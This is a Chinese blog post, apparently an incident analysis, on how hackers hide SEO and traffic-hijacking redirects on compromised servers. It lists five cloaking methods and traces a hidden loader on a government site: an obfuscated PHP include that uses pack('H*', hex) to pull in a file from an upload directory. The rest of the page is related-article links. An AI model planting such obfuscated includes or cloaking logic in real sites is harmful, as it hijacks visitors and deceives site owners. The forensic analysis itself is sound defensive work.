服务器动态隐藏跳转

最新推荐文章于 2024-09-28 22:33:00 发布
最新推荐文章于 2024-09-28 22:33:00 发布
阅读量178 收藏 4
点赞数 2
文章标签: 安全 笔记 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50822277/article/details/140565589
版权

我们可以按照基于不同隐藏目的的常见劫持手法,来做一个简单的分类

1、将爬虫与用户正常访问分开,实现搜索引擎快照劫持
2、将移动端与PC端的访问分开,实现移动端的流量劫持
3、根据用户访问来源进行判断,实现特定来源网站劫持
4、如果获取管理员的真实IP地址,实现特定区域的流量劫持
5、按照访问路径/关键词/时间段设置,实现特定路径/关键词/时间段的流量劫持

一政府站使用爬虫UA打开就是相应的寄生虫模板,直接分析其index.php文件,发现其只是调用了另外一个文件。文件的路径为:/phpcms/base.php

找到base.php,由于其源码比较多。分析其源码找了好久就是没有找到劫持所用的代码,后来花了好长时间才找到黑客进行劫持所有的代码。base.php其中直接加载了公用的函数库,其加载了如下函数:

@include(PACK(H*,443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31’));

在这里插入图片描述

Php的pack函数功能如下:
在这里插入图片描述

@include(PACK(‘H*’,’443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31’));其中:

H代表16进制

443A5C7765625C6C79715C75706C6F616466696C655C323031375C303232315C31表示相应的参数,需要将其进行转换。
在这里插入图片描述

转换后,其内容为\web\lyq\uploadfile\2017\0221\1,也就是说base.php使用include的Pack函数调用了\web\lyq\uploadfile\2017\0221\1这个文件。找到这个文件,分析其源码,果然找到了黑客用户进行劫持所调用的文件。

在这里插入图片描述

晚来的棠棠
关注
html隐藏链接跳转,HTML 链接
weixin_39761422的博客
06-03 2290
HTML 链接HTML 使用超级链接与网络上的另一个文档相连。几乎可以在所有的网页中找到链接。点击链接可以从一张页面跳转到另一张页面。尝试一下 - 实例HTML 链接如何在HTML文档中创建链接。(可以在本页底端找到更多实例)HTML 超链接(链接)HTML使用标签 来设置超文本链接。超链接可以是一个字,一个词,或者一组词,也可以是一幅图像,您可以点击这些内容来跳转到新的文档或者当前文档中的某个部...
网站隐藏跳转代码php,域名跳转代码[可隐藏与不隐藏域名转向代码(自动跳转代码) ]...
weixin_42201721的博客
03-27 2630
许多域名都绑在上面,而且也就一个虚拟目录的话就可以这么做。我开始买服务器的时候那IDC商说可以绑12个域名,而且说的和租,就以为那多分几个目录没什么关系。但是结果我注册交钱了却12个域名只能指向同一个目录,无奈就只有想出这个鬼方法。使用方法很简单,比如第一句,的意思就是用户输入的是hi1000y.cn,那么就自动跳转到http://hi.baidu.com/netfate,面的意思都是样的...
怎么进入服务器修改跳转域名,如何增加域名的URL跳转功能
weixin_39785286的博客
07-31 1013
如果注册顶级域名的时候没有选择支持URL跳转的选配功能该怎么办呢?不怕,自己为帐号充值,然后购买就可以了;首先当然是使用帐号登录到贝锐网站(www.oray.cn) ,【管理中心】-【域名】-【顶级域名】;点击需要升级选配的域名进入另外的界面,选择【其它服务】-【域名选配】;点击升级选配;升级界面,点击选配的下拉表出现一个弹窗,在左边把需要的配件选择到右边,选择好之后点击确定;点击立即下单,支付相...
服务器上登录网页ip地址,如何在服务器上做iP地址跳转
weixin_39857174的博客
08-09 1798
如何在服务器上做iP地址跳转 内容精选换一换当网站没有接入到WAF前,DNS直接解析到源站的IP。网站接入WAF后,需要把DNS解析到WAF的CNAME,这样流量才会先经过WAF,WAF再将流量转到源站,实现网站流量检测和攻击拦截。本文介绍通过DNS配置模式接入WAF时,如何在已添加网站配置后,配置域名解析,实现业务接入。已有网站域名。已购买WAF。已将网站信息(源站服务器的IP、零系统:ubun...
服务器跳转后访问网页怎么设置,什么是域名URL转发?如何设置
weixin_32190377的博客
08-03 2368
一、什么是URL转发?URL(Uniform Resource Locator:统一资源定位器)是WWW页的地址,它从左到右由下述部分组成:Internet资源类型(scheme):指出WWW客户程序用来操作的工具。如“http://” 表示 WWW 服务器,“ftp://” 表示 FTP 服务器,“gopher://” 表示Gopher服务器,而“new:”表示Newgroup新闻组。服务器地址...
nginx配置服务器跳转实现一个域名访问两台服务器
yanyujingzhe的博客
04-17 5074
其实只需要修改配置文件nginx.conf,在server中添加location就好 server { listen 80; server_name 你的域名或ip,例:www.baidu.com; location / { root html; index index.html ...
免费CDN加速隐藏你的服务器原ip以防别人攻击
qq_272778299的博客
11-09 1822
QQ交流:1014549449 --------------点击跳转 青龙安装教程 kingfeng安装教程 其他教程看完主页 这里以kingfeng端口为例 1.注册七牛的免费cdn 官方链接 注册好 > 登录控制台 > 然后点添加域名 看图片 2.添加域名配置并配置。 源ip: 填你的服务器ip 端口:填你的 开放kingfeng端口 3.上面都配置完,去你的域名服务商解析CNAME记录 主机值: 你刚才在cdn添加二级域名前缀是什么你就填什么 解析类型:CNAME 记录值 :你在
实现网站(网页)跳转且可隐藏跳转后网址的代码
热门推荐
bystarlight的博客
05-05 4万+
点击打开链接 实现网站(网页)跳转且可隐藏跳转后网址的代码 澄子 2017-04-04 23:44:01 浏览304 评论0 阿里云 域名 根目录 http 网页设计 UI htdocs charset index html 摘要: 实现网站(网页)跳转且可隐藏跳转后网址的代码 1.实现网站(网页)跳转且可隐藏跳转后网址的代码 优
3、服务器基本原理与搭建
qingttqing的博客
12-22 2028
服务器网络中为其它客户机(如PC机、智能手机、ATM等终端甚至是火车系统等大型设备)提供计算或者应用服务。服务器具有高速的CPU运算能力、长时间的可靠运行、强大的I/O外部数据吞吐能力以及更好的扩展性。一般来说服务器都具备承担响应服务请求、承担服务、保障服务的能力。服务器又叫伺服器,从客观意义来讲,服务器就是一台电脑。通过网址来访问服务器中的内容。域名系统(英文:Domain Name System,缩写:DNS)是互联网的一项服务。
tomcat服务器显示异常,隐藏tomcat页面异常显示的版本信息
weixin_34171095的博客
08-05 3829
1.正常情况下,tomcat遇到404或500会返回版本信息:2.有时我们不需要暴露版本信息,像这样:3.只需要修改apache-tomcat-7.0.59的lib目录下的catalina.jar,用好压打开修改为修改为4.在linux环境下进入lib路径unzip catalina.jar编辑ServerInfo.properties属性文件cd org/apache/catalina/util...
Javascript中document.referrer隐藏来源的方法
10-20
例如,在流量提供方不希望让联盟了解流量来源的情况下,隐藏document.referrer就可以防止其他方获取到敏感的跳转信息。 隐藏document.referrer最常用的方法是使用iframe。通过创建一个内嵌的iframe,我们可以将链接...
jQuery实现页码跳转动态数据分页
10-18
本篇内容主要讲述了如何利用jQuery实现一种动态的数据分页功能,其核心特点为用户在进行页码跳转时页面不会进行刷新,大大提升了用户体验,并适合小型数据集或者多级网页内容的加载。文中提到了一个关键的jQuery插件...
链接、页面跳转隐藏、表单提交
05-06
- **应用场景**:适用于需要根据服务器响应动态显示或隐藏内容的情况。 #### 三、表单提交 表单提交是Web应用中最常见的交互方式之一,它允许用户向服务器发送数据。 - **示例**:上面已经介绍过的一个表单提交...
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 720
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网关:部标设备接入网关,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相关的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
SplashtopLoki的博客
09-27 609
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
安全服务面试
最新发布
m0_74402888的博客
09-28 515
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
网络编程(5)——模拟伪闭包实现连接的安全回收
m0_63086198的博客
09-26 1089
new_session通过bind绑定时,new_session的计数就会加一,所以在bind后,new_session的生命周期和新构造函数的生命周期相同,因为新生成的函数对象引用了new_session(new_session通过值传递的方式被复制构造函数使用)。,但是通过bind操作,将new_session作为数值传递给bind函数,而bind函数返回的函数对象内部引用了该new_session所以引用计数增加1,这样保证了new_session不会被释放。今天学习如何通过C11智能指针构造伪。
注册安全分析报告:人民卫生音像
Explinks的博客
09-25 694
人民卫生音像出版社,作为国家卫生健康委员会、中宣部、财政部、教育部等国家部委的领导下的官方企业, 采用的是通俗的滑动验证产品, 该产品稳定并且市场占有率很高, 在一定程度上提高了用户体验, 但安全性在机器学习的今天, 已经无法应对攻击了,并且正是由于该产品通俗, 所以在网上破解的文章和教学视频也是大量存在,并且经过验证滑动产品很容易被破解, 所以除了滑动验证方式, 花样百出的产品层出不穷,但本质就是牺牲用户体验来提高安全。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 711
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Flex页面跳转实现与导航方法探讨
Flex页面跳转是通过组合使用ViewStack、navigateToURL以及其他与服务器端交互的机制,来实现用户界面的动态管理,提供丰富的用户体验。同时,开发者需要了解Flex的生命周期管理,以便在不同阶段恰当地调用跳转方法。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

晚来的棠棠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值